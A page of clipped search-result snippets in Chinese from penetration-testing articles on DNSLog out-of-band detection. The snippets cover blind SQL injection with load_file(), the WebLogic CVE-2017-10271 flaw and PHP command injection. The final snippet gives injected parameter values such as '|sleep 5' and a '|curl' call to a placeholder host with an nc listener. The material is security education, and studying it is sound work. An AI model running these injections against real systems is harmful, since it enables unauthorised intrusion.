0x01 DNSLOG回顯原理 測試一些網站的時候，一些注入都是無回顯的，我們可以寫腳本來進行盲注，但有些網站會ban掉我們的ip，這樣我們可以通過設置ip代理池解決， 但是盲注往往效率很低，所以產生了DNSlog注入。具體原理如下。 首先需要有一個可以配置的域名，比如：ceye.io ...

一、什么是DNSLog DNS的全稱是Domain Name System（網絡名稱系統），它作為將域名和IP地址相互映射，使人更方便地訪問互聯網。當用戶輸入某一網址如www.baidu.com，網絡上的DNS Server會將該域名解析，並找到對應的真實IP如127.0.0.1，使用戶可以訪問 ...

0x01 原理 NS（Name Server）記錄是域名服務器記錄，用來指定該域名由哪個DNS服務器來進行解析 DNS：域名解析服務器 A記錄：指定域名對應的IP地址 一句話歸納😪😪 ...

通過DNSLOG回顯驗證漏洞 前言 實際滲透測試中，有些漏洞因為沒有回顯導致無法准確判斷漏洞是否存在，可能導致滲透測試人員浪費大量精力在一個並不存在的漏洞上，因此為了驗證一些無回顯漏洞，可結合DNSlog平台進行測試，本文使用的DNSlog平台鏈接如下：http://dnslog ...

前言： 實際滲透測試中，有些漏洞因為沒有回顯導致無法准確判斷漏洞是否存在，可能導致滲透測試人員浪費大量精力在一個並不存在的漏洞上，因此為了驗證一些無回顯漏洞，可結合DNSlog平台進行測試，DNSlog平台鏈接如下：//dnslog.cn/ 環境搭建： 1.安裝 docker desktop ...

作者：Armyzer0 Weblogic(CVE-2017-10271) 漏洞出來以后又是一波血雨腥風，正好我昨天測試的時候發現了一個存在這個漏洞的weblogic，但是他不回顯咋辦呢！讓他返回執行結果集到dnslong首先大家先了解下 “ 這個符號在Linux的作用！ 符號 ...

step1： 通過DNSlog盲注需要用到load_file()函數。show variables like '%secure%' 查看load_file()可以讀取的磁盤。 1、當secure_file_priv為空，就可以讀取磁盤的目錄。 2、當secure_file_priv為G ...

本文由學習https://xz.aliyun.com/t/8125中收獲得知識而來，附帶個人的一些思考。 甲、php無回顯時命令注入判斷方法 利用延時 ip=|sleep 5 HTTP請求 ip=|Curl 'http://x.x.x.x:233' Nc -lvv ...